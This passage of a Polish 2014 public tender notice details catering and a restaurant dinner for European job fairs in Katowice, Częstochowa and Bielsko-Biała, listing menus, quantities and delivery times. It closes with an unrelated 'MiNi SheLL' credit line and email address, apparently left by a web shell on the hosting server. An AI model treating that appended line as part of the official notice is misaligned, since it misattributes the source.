- z serem żółtym i oliwkami (100 szt. x 40 g);
3. Świeże owoce podawane na paterach:
- banany - 2 kg
- winogrona (zielone, czarne) - łącznie 2 kg
- mandarynki - 2 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (150 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (150 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) łącznie 6 kg, podawane na szklanych, metalowych lub porcelanowych paterach,  

5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (50 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (50 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (50 szt.)
- roladki naleśnikowe z nadzieniem z łososia i szpinakiem (50 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 200 szt.)
6. Sałatki - 2 rodzaje:
- sałatka ryżowa z tuńczykiem i oliwkami - dziki ryż, tuńczyk, kukurydza, czarne oliwki (120 porcji 
x 100 g)
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (120 porcji x 100 g),
7. Ciepły posiłek podany w podgrzewaczach:
- żurek staropolski z jajkiem i kiełbasą (120 porcji x 400 ml),
- barszcz czerwony (120 porcji x 250 ml),
- krokiety z kapustą i grzybami (120 porcji x min. 130 g)
- pieczywo mieszane - białe, ciemne (bez ograniczeń). 

8. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
9. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
10. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00).
11. Transport. 

Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów - budynku Śląskiego Urzędu Wojewódzkiego mieszczącego się przy ul. Jagiellońskiej 25 w Katowicach (Sala Szara, I piętro).
Napoje (poz. 1), kanapki bankietowe (poz. 2), świeże owoce (poz. 3), wyroby cukiernicze (poz. 4) powinny zostać dostarczone do godz. 9:00.
Przekąski koktajlowe (poz. 5), sałatki (poz. 6) i ciepły posiłek podawany w podgrzewaczach (poz. 7) powinny zostać dostarczone na godz. 12:00. 
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 100 butelek (500 ml) wody mineralnej gazowanej,
- 130 butelek (500 ml) wody mineralnej niegazowanej,
- 250 kubeczków jednorazowych,
- herbatniki typu petit beurre (100 opakowań po min. 100g).
Wyżej wymienione produkty należy dostarczyć do godz. 8:00 i rozłożyć na stoiskach do godz. 9:00 według wskazówek wyznaczonego pracownika WUP..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców (łącznie 80 osób) podczas Europejskich Targów Pracy, Przedsiębiorczości i Edukacji w CZĘSTOCHOWIE w dniu 09.10.2014 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców (łącznie 80 osób) podczas Europejskich Targów Pracy, Przedsiębiorczości i Edukacji w CZĘSTOCHOWIE w dniu 09.10.2014 r. 
Na usługę składać się będą:
1. Napoje: 
- kawa: wysokogatunkowa, rozpuszczalna do samodzielnego przygotowania (160 saszetek o wadze 2gr), 
- herbata: wysokogatunkowa, ekspresowa (min. 3 rodzaje: czarna, owocowa, zielona), wykładana 
w drewnianych pudełkach do samodzielnego przygotowania (łącznie 160 torebek herbaty z zawieszką 
o wadze 2gr., w tym 80 torebek herbaty czarnej), 
- dodatki: cukier, cytryna w plasterkach, mleczko skondensowane (7%) lub śmietanka - bez ograniczeń,   
- wrzątek podawany w termosach lub warnikach (min. 3 sztuki) - bez ograniczeń,
- woda mineralna niegazowana (50 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (40 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (40 porcji x 200 ml), jabłkowy (40 porcji x 200 ml), z czarnej porzeczki (40 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 160 sztuk):
- z zieloną sałatą, szynką i pomidorkiem (40 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (40 szt. x 40 g),
- z pastą jajeczno-szczypiorkową i świeżymi warzywami (40 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (40 szt. x 40 g); 
3. Świeże owoce podawane na paterach:
- banany - 1 kg
- winogrona (zielone, czarne) - łącznie 2 kg
- mandarynki - 1,5 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (60 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (60 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) łącznie 3 kg, podawana na szklanych, metalowych lub porcelanowych paterach.
5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (40 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (40 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (40 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 80 szt.)
6. Sałatki - 2 rodzaje:
- sałatka ryżowa z tuńczykiem i oliwkami - dziki ryż, tuńczyk, kukurydza, czarne oliwki (40 porcji x 100 g)
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (40 porcji x 100 g),

7. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
8. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
9. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00).
10. Transport. 
Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów w Częstochowie do godz. 9:00, dokładny adres dostarczenia zostanie przekazany Wykonawcy w dniu podpisania umowy.  
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 30 butelek (500 ml) wody mineralnej gazowanej,
- 40 butelek (500 ml) wody mineralnej niegazowanej,
- 80 kubeczków jednorazowych,
- herbatniki typu petit beurre (40 opakowań po min. 100g).
Wyżej wymienione produkty należy dostarczyć do godz. 8:00 i rozłożyć na stoiskach do godz. 9:00 według wskazówek wyznaczonego pracownika WUP..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców (łącznie 80 osób) podczas Europejskich Targów Pracy, Przedsiębiorczości i Edukacji w BIELSKU - BIAŁEJ w dniu 09.10.2014 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców (łącznie 80 osób) podczas Europejskich Targów Pracy, Przedsiębiorczości i Edukacji w BIELSKU - BIAŁEJ w dniu 09.10.2014 r. 
Na usługę składać się będą:
1. Napoje: 
- kawa: wysokogatunkowa, rozpuszczalna do samodzielnego przygotowania (160 saszetek o wadze 2gr), 
- herbata: wysokogatunkowa, ekspresowa (min. 3 rodzaje: czarna, owocowa, zielona), wykładana 
w drewnianych pudełkach do samodzielnego przygotowania (łącznie 160 torebek herbaty z zawieszką 
o wadze 2gr., w tym 80 torebek herbaty czarnej), 
- dodatki: cukier, cytryna w plasterkach, mleczko skondensowane (7%) lub śmietanka - bez ograniczeń,   
- wrzątek podawany w termosach lub warnikach (min. 3 sztuki) - bez ograniczeń,
- woda mineralna niegazowana (50 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (40 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (40 porcji x 200 ml), jabłkowy (40 porcji x 200 ml), z czarnej porzeczki (40 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 160 sztuk):
- z zieloną sałatą, szynką i pomidorkiem (40 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (40 szt. x 40 g),
- z pastą jajeczno-szczypiorkową i świeżymi warzywami (40 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (40 szt. x 40 g); 
3. Świeże owoce podawane na paterach:
- banany - 1 kg
- winogrona (zielone, czarne) - łącznie 2 kg
- mandarynki - 1,5 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (60 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (60 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) łącznie 3 kg, podawana na szklanych, metalowych lub porcelanowych paterach.
5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (40 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (40 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (40 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 80 szt.)

6. Sałatki - 2 rodzaje:
- sałatka ryżowa z tuńczykiem i oliwkami - dziki ryż, tuńczyk, kukurydza, czarne oliwki (50 porcji x 100 g)
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (50 porcji x 100 g),

7. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
8. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
9. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00).
10. Transport. 
Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów w Bielsku-Białej do godz. 9:00, dokładny adres dostarczenia zostanie przekazany Wykonawcy w dniu podpisania umowy.  
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 30 butelek (500 ml) wody mineralnej gazowanej,
- 40 butelek (500 ml) wody mineralnej niegazowanej,
- 80 kubeczków jednorazowych,
- herbatniki typu petit beurre (30 opakowań po min. 100g).
Wyżej wymienione produkty należy dostarczyć do godz. 8:00 i rozłożyć na stoiskach do godz. 9:00 według wskazówek wyznaczonego pracownika WUP..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usługi restauracyjnej (kolacji) w formie bufetu szwedzkiego według skróconego menu wydanej w restauracji, którą zapewni Wykonawca, w dniu 09.10.2014 r. od godz. 18:00. dla 28 zagranicznych gości i wystawców biorących udział w Europejskich Targach Pracy, Przedsiębiorczości i Edukacji w Katowicach oraz przedstawicieli organizatora..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi restauracyjnej (kolacji) w formie bufetu szwedzkiego według skróconego menu wydanej w restauracji, którą zapewni Wykonawca, w dniu 09.10.2014 r. od godz. 18:00. dla 28 zagranicznych gości i wystawców biorących udział w Europejskich Targach Pracy, Przedsiębiorczości i Edukacji w Katowicach oraz przedstawicieli organizatora. 
Liczba uczestników: nie mniej niż 18 osób oraz nie więcej niż 28 osób. Ostateczna liczba uczestników zostanie przekazana Wykonawcy na 2 dni robocze przed wykonaniem usługi. 
Usługa restauracyjna (kolacja) wydana w formie bufetu szwedzkiego lub kolacji zasiadanej według skróconego menu (do ustalenia z wyłonionym Wykonawcą).
Restauracja powinna:
- być zlokalizowana w sąsiedztwie siedziby Zamawiającego i miejsca odbywania Targów, rozumianym jako obszar ograniczony następującymi ulicami: 
od północy, ulicą Andrzeja od skrzyżowania z ulica Mikołowską, następnie ulicą T. Kościuszki przechodzącą w ulicę M. Konopnickiej i ulicą Wojewódzką do skrzyżowania z ulicą J. Lompy, 
od wschodu, ulicą J. Lompy od skrzyżowania z ulicą Wojewódzką do wjazdu na Aleję Górnośląską,  
od południa, Aleją Górnośląską od wjazdu od strony ulicy Lompy do skrzyżowania z ulicą Mikołowską, 
od zachodu, ulicą Mikołowską od skrzyżowania z Aleją Górnośląską do skrzyżowania z ulicą Andrzeja, 
ORAZ
od północy, ulicą Warszawską od skrzyżowania z ulicą Rynek do skrzyżowania z ulicą Andrzeja Mielęckiego,
 od wschodu, ulicą Andrzeja Mielęckiego od skrzyżowania z ulicą Warszawską do skrzyżowania 
z ulicą Dworcową i ulicą Tadeusza Kościuszki. 
* od południa, ulicą Dworcową od skrzyżowania z ulicą świętego Jana i ulicą Tadeusza Kościuszki do skrzyżowania z ulicą Andrzeja Mielęckiego,od zachodu, od skrzyżowania z ulicą Tadeusza Kościuszki i ulicą Dworcową wzdłuż ulicy świętego Jana przechodzącej w ul. Rynek do skrzyżowania z ulicą Warszawską.

- dysponować wyodrębnioną salą zdolną pomieścić  28 gości, która będzie udostępniona do wyłącznej dyspozycji Zamawiającego w dniu 09.10.2014 r. od godz. 18:00 do ok. godz. 23:00. 

Na usługę składać się będą:
- 3 rodzaje przystawek (pieczarki faszerowane z szynką lub ziołami, carpaccio z polędwicy wołowej lub łososia, paluszki serowe panierowane z sosem musztardowo-miodowym), 
- 2 rodzaje zup (cebulowa z grzankami i serem, krem z borowików), 
- 3 dania główne (kieszonka z kurczaka nadziewana serem, makaron penne ze szpinakiem 
i suszonymi pomidorami, dorsz w koszulce z masłem koperkowym),
- dodatki: grillowane warzywa (bakłażan, cukinia, marchew, cebula, papryka), zestaw surówek, ryż, zapiekane ziemniaki, 
- deser: ciasto domowe z owocami, świeże owoce, 
- napoje: woda mineralna, soki (jabłkowy, z czarnej porzeczki), kawa, herbata, 1 lampka wina na osobę, 
- obsługa kelnerska przez cały czas trwania kolacji, przy czym przynajmniej jedna osoba z obsługi kelnerskiej powinno posługiwać się językiem angielskim w stopniu przynajmniej komunikatywnym.     

Przez restaurację Zamawiający rozumie: lokal gastronomiczny  świadczący na co dzień na miejscu usługę restauracyjną dla gości na indywidualne zamówienie według karty menu przy stolikach 
z obsługą kelnerską (Zamawiający wyklucza organizację kolacji w lokalach typu: restauracja samoobsługowa, stołówka, bar, bistro, Fast food, kawiarnia, pub, klub, dyskoteka, catering oraz lokale gastronomiczne specjalizujące się w jednym rodzaju dań np. pizzerie, pierogarnie). 

Wykonawca musi posiadać odpowiednie zaplecze techniczne i sanitarne oraz toalety dla gości. Ponadto Wykonawca powinien zapewnić odpowiedni wystrój sali (dekoracje stołów, obrusy materiałowe, dopasowane serwetki papierowe, muzyka w tle, lampy-świece). Ustawienie stołów zostanie ustalone z wyłonionym Wykonawcą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com